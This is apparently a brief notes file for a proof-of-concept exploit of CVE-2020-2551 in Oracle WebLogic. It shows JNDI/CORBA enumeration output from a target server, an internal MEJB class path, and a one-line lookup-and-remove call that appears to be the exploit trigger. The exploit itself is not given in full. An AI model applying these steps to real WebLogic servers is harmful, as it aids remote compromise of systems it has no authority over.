1、CVE-2020-2551
CVE-2020-2551 poc exploit python example
2、your know your do
{
"ejb": {
"class": "com.sun.jndi.cosnaming.CNCtx",
"interfaces": [
"javax.naming.Context"
],
"mgmt": {
"MEJB": {
"class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
"interfaces": []
},
"class": "com.sun.jndi.cosnaming.CNCtx",
"interfaces": [
"javax.naming.Context"
]
}
},
"javax": {
"class": "com.sun.jndi.cosnaming.CNCtx",
"error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
"interfaces": [
"javax.naming.Context"
]
},
"jdbc": {
"class": "com.sun.jndi.cosnaming.CNCtx",
"db_xf": {
"class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
"interfaces": []
},
"interfaces": [
"javax.naming.Context"
]
},
"mejbmejb_jarMejb_EO": {
"class": "com.sun.corba.se.impl.corba.CORBAObjectImpl",
"interfaces": []
},
"weblogic": {
"class": "com.sun.jndi.cosnaming.CNCtx",
"error msg": "org.omg.CORBA.NO_PERMISSION: vmcid: 0x0 minor code: 0 completed: No",
"interfaces": [
"javax.naming.Context"
]
}
}
3、ejb
/bea_wls_internal/classes/mejb@/
weblogic.management.j2ee.mejb.Mejb_dj*#remove(Object obj)
4、jta
x.lookup("ejb/mgmt/MEJB").remove(jta);